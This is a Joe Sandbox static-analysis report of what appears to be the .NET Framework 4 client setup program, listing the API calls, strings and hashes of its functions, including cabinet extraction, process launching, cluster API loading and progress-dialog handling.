                                                                                                                                                                    • Opcode Fuzzy Hash: 15edc2da5a99a366a1b840b7d24b4557f359ebc6fad2660161e5426f66516693
                                                                                                                                                                    • Instruction Fuzzy Hash: 4B116D72B882029BF3651B71AD0ABE63AE85F11784F25803CBB0DDA1A1E7ADC4C05695
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000335E6: _malloc.LIBCMT ref: 00033600
• DeleteCriticalSection.KERNEL32(?,?), ref: 0002003F
• DeleteCriticalSection.KERNEL32(?,?,?), ref: 00020592
  • Part of subcall function 00022B6C: __EH_prolog3.LIBCMT ref: 00022B73
• DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?), ref: 00020433
• DeleteCriticalSection.KERNEL32(?,?), ref: 0002070F
• DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?), ref: 000208F7
• DeleteCriticalSection.KERNEL32(?,?), ref: 00020AE6
  • Part of subcall function 00028513: __EH_prolog3.LIBCMT ref: 0002851D
• __CxxThrowException@8.LIBCMT ref: 00020B37
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CriticalDeleteSection$H_prolog3$Exception@8Throw_malloc
• String ID: ($)
• API String ID: 3630289165-2051389312
• Opcode ID: 082a5472a51113d65de4865b1bec6b357bb7a66d07f40c886240ab71edd6b662
• Instruction ID: 9ab64b030c0eb6d3187c6d4393b8fa52969780e1919161d3ab27410f3d8218e4
• Opcode Fuzzy Hash: 082a5472a51113d65de4865b1bec6b357bb7a66d07f40c886240ab71edd6b662
• Instruction Fuzzy Hash: 40B23071508386CFD371DF68D488BDABBE4BF89304F04496EE58D87252CB71A889CB52
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3_
• String ID: "
• API String ID: 2427045233-123907689
• Opcode ID: 68dd5cce31387cd42ae8f98b2d7aea574bf8d53defb8944c716c39a1faee40af
• Instruction ID: 2ed4cf0f57dd86fb95ad4763dee69314176b42c612a0742204f20140bdeb1538
• Opcode Fuzzy Hash: 68dd5cce31387cd42ae8f98b2d7aea574bf8d53defb8944c716c39a1faee40af
• Instruction Fuzzy Hash: BC725870508391DFD721DF68D488B9EBBE4BF89304F144A6DE5C98B252CB74E845CB62
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDriveTypeW.KERNELBASE(00017887,00000000,?), ref: 00017A32
• SetErrorMode.KERNELBASE(00000000), ref: 00017A50
• SetErrorMode.KERNELBASE(00000000), ref: 00017A59
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00017A8B
• DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00017AB0
• CloseHandle.KERNEL32(?), ref: 00017AC5
• SetErrorMode.KERNELBASE(?), ref: 00017ACE
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ErrorMode$CloseControlCreateDeviceDriveFileHandleType
• String ID: \\.\?:
• API String ID: 1714706890-2364848050
• Opcode ID: 20494446aace7ba285ae001ddc003272d3548e84437932189a2761f4dd282c2d
• Instruction ID: 956f9dc3a99f5f3c13a446916467ae807bc69e785a01f97a5876735f7fa75d21
• Opcode Fuzzy Hash: 20494446aace7ba285ae001ddc003272d3548e84437932189a2761f4dd282c2d
• Instruction Fuzzy Hash: FA216D71D04219BBDB26DFA5EC48ADEBBB9EF89320F004415F605E7190D7B19681CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(?,?,00000000), ref: 000184E2
• swprintf.LIBCMT ref: 00018513
  • Part of subcall function 0001870C: lstrlenA.KERNEL32(00000000,00000004,?,?,0003C170,?,?,?,?,000184C0,?,?,00000000,?,00018526,?), ref: 00018738
  • Part of subcall function 0001870C: WriteFile.KERNELBASE(00000000,00000004,00000004,00000000,?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170), ref: 00018762
  • Part of subcall function 0001870C: WriteFile.KERNELBASE(00014DA4,00000002,00000004,00000000,?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170), ref: 00018787
  • Part of subcall function 0001870C: GetLastError.KERNEL32(?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170,0003C170,00000032,%u/%u/%u, %u:%u:%u,?), ref: 0001878D
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: FileWrite$ErrorLastLocalTimelstrlenswprintf
• String ID: %u/%u/%u, %u:%u:%u$[%s]
• API String ID: 4160318958-2469116371
• Opcode ID: f0b53fd557eb7ff790b60228a738f7f2dd802c4db6624ecc35ed11c5142fd40a
• Instruction ID: 01829ff85255d32666ff3563b37627df478823d167ddb5afd7cc706eb89fe84a
• Opcode Fuzzy Hash: f0b53fd557eb7ff790b60228a738f7f2dd802c4db6624ecc35ed11c5142fd40a
• Instruction Fuzzy Hash: 3A017C71900118BADB01EF969C05EFFB7BCAF49B14F000062FA40E6081D638DE81D771
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTimeZoneInformation.KERNELBASE(?), ref: 00018EB8
• GetSystemTime.KERNEL32(?), ref: 00018EC2
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 00018ED7
Strings
• %04d/%02d/%02d %02d:%02d:%02d, xrefs: 00018EFB
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Time$System$InformationLocalSpecificZone
• String ID: %04d/%02d/%02d %02d:%02d:%02d
• API String ID: 1716759327-2911751566
• Opcode ID: 5465d8fddbcafff6de9e5f4c851abd281daa005fb273f1ff56ba463421be478f
• Instruction ID: 5d355f3bcbb021d71997bff1411340ff526b78e342f6c44673e9bbbd3d0040f2
• Opcode Fuzzy Hash: 5465d8fddbcafff6de9e5f4c851abd281daa005fb273f1ff56ba463421be478f
• Instruction Fuzzy Hash: 5201D6B290011DBACB10DBD5D949AFFB7FCAF0C605F004056FA45E2040EA38AA44DB71
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 00022060
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00022229
                                                                                                                                                                      • Part of subcall function 00033B07: RaiseException.KERNEL32(?,?,00033665,?,?,?,?,?,00033665,?,00037124,0003BE98), ref: 00033B49
                                                                                                                                                                      • Part of subcall function 000335E6: _malloc.LIBCMT ref: 00033600
                                                                                                                                                                      • Part of subcall function 000335E6: std::exception::exception.LIBCMT ref: 00033635
                                                                                                                                                                      • Part of subcall function 000335E6: std::exception::exception.LIBCMT ref: 0003364F
                                                                                                                                                                      • Part of subcall function 000335E6: __CxxThrowException@8.LIBCMT ref: 00033660
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception$ExceptionH_prolog3_catchRaise_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1092593795-0
                                                                                                                                                                    • Opcode ID: 6b606f6b34fe14e6922f9ca1e3bcc7bd2597f23bcde83e1ac32166426de71521
                                                                                                                                                                    • Instruction ID: be343213af3a4bbbf4bf8bd988f1d5e939742fe9972562866f52b8ffdda522ed
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b606f6b34fe14e6922f9ca1e3bcc7bd2597f23bcde83e1ac32166426de71521
                                                                                                                                                                    • Instruction Fuzzy Hash: E0426C70900269EFCB11CFA8D588ADDBBF4BF59304F248189E449AB352D775AE85CF60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8H_prolog3Throw
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3670251406-0
                                                                                                                                                                    • Opcode ID: 1a6ce538c6e160e7d11cd33444db61de811534d95da30615c48675af8884f794
                                                                                                                                                                    • Instruction ID: 750e83e6c5202139df6214a471fc2b223f4abc04444227b7ea17c5fa21cf1bf2
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a6ce538c6e160e7d11cd33444db61de811534d95da30615c48675af8884f794
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A425271D00269DFCF60DF94D880ADDBBB5BF18310F1581AAE549AB252D730AE85CF91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemInfo.KERNELBASE(?), ref: 0001CACB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: 90bafad1c3b892b88532a8396776877c367ca7160600d2d9746857f75f20a6b1
                                                                                                                                                                    • Instruction ID: 216f419f1f52a9b85f161381fae4e6c2fbd23f88e88a3d694792868978dbdc2f
                                                                                                                                                                    • Opcode Fuzzy Hash: 90bafad1c3b892b88532a8396776877c367ca7160600d2d9746857f75f20a6b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 58F0B7B5900B458BC320DF6AC844ADBFBF8BF88308F50491ED8BA93210D7B4A5898F50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

APIs
• _memset.LIBCMT ref: 00015E2A
  • Part of subcall function 000195C3: GetCurrentDirectoryW.KERNEL32(00000040,00000000,00000000,00000000,X?f,?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?), ref: 000195E8
  • Part of subcall function 000195C3: GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?,?,00000000), ref: 00019607
  • Part of subcall function 000195C3: GetLastError.KERNEL32(?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?,?,00000000,?,?,00015B53), ref: 0001960D
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 0001604C
• GetExitCodeProcess.KERNEL32(?,?), ref: 00016058
• CloseHandle.KERNEL32(00015BB4,?,?,?,?,?,?), ref: 00016067
• CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0001606C
Strings
• Failed to get the name of the module, xrefs: 00015E7D
• Executing command line: '%S', xrefs: 00015FA2
• Failed to start the process, xrefs: 00015FE3
• 2, xrefs: 00016027
• Failed to stop reporting progress, xrefs: 00016038
• _SFX_CAB_EXE_PARAMETERS, xrefs: 00015F08
• Failed to set _SFX_CAB_EXE_PACKAGE, xrefs: 00015EF8
• Failed to get current directory, xrefs: 00015E4A
• Failed to set _SFX_CAB_EXE_PARAMETERS, xrefs: 00015F34
• _SFX_CAB_EXE_PACKAGE, xrefs: 00015ECC
• _SFX_CAB_EXE_PATH, xrefs: 00015E93
• __COMPAT_LAYER, xrefs: 00015F4B
• Failed to set _SFX_CAB_EXE_PATH, xrefs: 00015EBF
• Failed to set __COMPAT_LAYER, xrefs: 00015F77
• Failed to set target directory, xrefs: 00015E65
• Unable to resolve the path of the exe, xrefs: 00015F93
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CloseCurrentDirectoryHandle$CodeErrorExitLastObjectProcessSingleWait_memset
• String ID: 2$Executing command line: '%S'$Failed to get current directory$Failed to get the name of the module$Failed to set _SFX_CAB_EXE_PACKAGE$Failed to set _SFX_CAB_EXE_PARAMETERS$Failed to set _SFX_CAB_EXE_PATH$Failed to set __COMPAT_LAYER$Failed to set target directory$Failed to start the process$Failed to stop reporting progress$Unable to resolve the path of the exe$_SFX_CAB_EXE_PACKAGE$_SFX_CAB_EXE_PARAMETERS$_SFX_CAB_EXE_PATH$__COMPAT_LAYER
• API String ID: 3070882113-3483177241
• Opcode ID: 56030f64cce282e52bf536c15cb6d4ed237f084c6b21bec71dcc651b350709de
• Instruction ID: 2949af744e6f75cd328a362fe0284d1aeeb62be1c07f6536516a9788e0a7d8fe
• Opcode Fuzzy Hash: 56030f64cce282e52bf536c15cb6d4ed237f084c6b21bec71dcc651b350709de
• Instruction Fuzzy Hash: 1A61D372D40625FFDB225BA48C05AEEBAA8AF48751F124125FE10FB291D7758EC18B90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
  • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
• GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0001809F
• GetLastError.KERNEL32 ref: 000180A9
Strings
• OpenCluster, xrefs: 0001815E
• ClusterEnum, xrefs: 000181A6
• Failed to load clusapi.dll, xrefs: 0001814E
• %s\clusapi.dll, xrefs: 00018100
• CloseCluster, xrefs: 00018173
• ClusterOpenEnum, xrefs: 00018184
• Failed to allocate the path ro the clusapi.dll, xrefs: 00018114
• Failed to allocate the system directory, xrefs: 00018091
• ClusterCloseEnum, xrefs: 00018195
• Failed to get the system directory, xrefs: 000180CA
• CloseClusterResource, xrefs: 000181C8
• Successfully bound to the ClusApi.dll, xrefs: 000181EA
• ClusterResourceControl, xrefs: 000181D9
                                                                                                                                                                    • Failed to load all required functions from the clusapi.dll, xrefs: 00018219
                                                                                                                                                                    • OpenClusterResource, xrefs: 000181B7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                     • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocDirectoryErrorLastProcessSystem
                                                                                                                                                                    • String ID: %s\clusapi.dll$CloseCluster$CloseClusterResource$ClusterCloseEnum$ClusterEnum$ClusterOpenEnum$ClusterResourceControl$Failed to allocate the path ro the clusapi.dll$Failed to allocate the system directory$Failed to get the system directory$Failed to load all required functions from the clusapi.dll$Failed to load clusapi.dll$OpenCluster$OpenClusterResource$Successfully bound to the ClusApi.dll
                                                                                                                                                                    • API String ID: 1959106193-2729475906
                                                                                                                                                                    • Opcode ID: a915a79d9bd6ba203b06d053eda69e225866d2082555dcd125d05fef5fbd9bd9
                                                                                                                                                                    • Instruction ID: 9159f3f8e560695f48664561efc59666e076cdc48236ad701d080445d56fd81c
                                                                                                                                                                    • Opcode Fuzzy Hash: a915a79d9bd6ba203b06d053eda69e225866d2082555dcd125d05fef5fbd9bd9
                                                                                                                                                                    • Instruction Fuzzy Hash: A141177AA40706BAE75357749C85BE939ED9F84314F218035EB04E7191EFB8CBC58B10
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                     Control-flow Graph

                                                                                                                                                                     • Rendered graph not reproduced (legend: Executed / Not Executed); basic blocks 1676f through 168f3
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000002,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000167A6
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0003BF10,00000000,000001F4,?,?,0001635A,00000000,00000002,?,?,?,?,?,?,?,00015B83), ref: 000167C6
                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000167D6
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0001635A,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 000167E5
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(0003BF10,00000002,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000168B3
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000002,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000168DE
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000002,00000000,00000000,?,?,0001635A,00000000,00000002), ref: 000168EA
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create the UI thread, xrefs: 00016851
                                                                                                                                                                    • Failed to create progress reporting initialization event, xrefs: 0001680B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                     • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$CloseCriticalSection$CreateDeleteErrorEventInitializeLastModule
                                                                                                                                                                    • String ID: Failed to create progress reporting initialization event$Failed to create the UI thread
                                                                                                                                                                    • API String ID: 2625854008-3587447334
                                                                                                                                                                    • Opcode ID: c4b20cfa6cc0885b59f1b66b912e0cb3be02248c0b6a82e80bfe9c03af07a373
                                                                                                                                                                    • Instruction ID: 097af7f7de35b5b4a8ef9e3e6d6ef6b3f14508d53f78ee1531993d0dd985c733
                                                                                                                                                                    • Opcode Fuzzy Hash: c4b20cfa6cc0885b59f1b66b912e0cb3be02248c0b6a82e80bfe9c03af07a373
                                                                                                                                                                    • Instruction Fuzzy Hash: D141AF70901224EFF7229F64DC48CDE7AACFB05750B20852AF611F7161DB798AC0DBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                     Control-flow Graph

                                                                                                                                                                     • Rendered graph not reproduced (legend: Executed / Not Executed); basic blocks 16a56 through 16bd9
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00016AB5
                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00016AD6
                                                                                                                                                                    • SetEvent.KERNEL32 ref: 00016AE8
                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00016B0C
                                                                                                                                                                      • Part of subcall function 00016BE1: EnterCriticalSection.KERNEL32(0003BF10,?,?,?,00016AF8,?), ref: 00016BF2
                                                                                                                                                                      • Part of subcall function 00016BE1: MessageBoxW.USER32(?,00000000,00000024,0000000B), ref: 00016C28
                                                                                                                                                                      • Part of subcall function 00016BE1: LeaveCriticalSection.KERNEL32(0003BF10,?,?,00016AF8,?), ref: 00016C3E
                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00016B15
                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00016B3C
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00016B46
                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00016B7E
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00016B88
                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00016BBE
                                                                                                                                                                    • SendMessageW.USER32(00000000,?,?,?), ref: 00016BD0
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get status static control., xrefs: 00016B67
                                                                                                                                                                    • Failed to get progress bar control., xrefs: 00016BA9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                     • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$CriticalErrorItemLastSectionSend$CallbackDialogDispatcherEnterEventLeavePostQuitTextUserWindow
                                                                                                                                                                    • String ID: Failed to get progress bar control.$Failed to get status static control.
                                                                                                                                                                    • API String ID: 1786187333-1184021424
                                                                                                                                                                    • Opcode ID: fc7678d1204c2e23627191f6c31296757eaeddd6f2b276731484c94fc95c7d7a
                                                                                                                                                                    • Instruction ID: 4f53e11c9904270a081f6154a47b676e9f2fc039b7ba110a9aa023f3bcee49c9
                                                                                                                                                                    • Opcode Fuzzy Hash: fc7678d1204c2e23627191f6c31296757eaeddd6f2b276731484c94fc95c7d7a
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C411132808525ABEB726F54DC88DE93AA5EF81350B158121FE05F70A1E77B8ED0DB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                     Control-flow Graph

                                                                                                                                                                     • Rendered graph not reproduced (legend: Executed / Not Executed); basic blocks 1a505 through 1a67b
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00019B82
                                                                                                                                                                      • Part of subcall function 00019B6A: GetLastError.KERNEL32(?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 00019B8C
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00020000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A55A
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,00015AF6,X?f), ref: 0001A55D
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A57E
                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,?,00015AF6,X?f), ref: 0001A581
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0001A5A7
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,00015AF6,?,?), ref: 0001A5E3
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0001A5E6
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,8B000006), ref: 0001A5F7
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0001A5FA
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001A60C
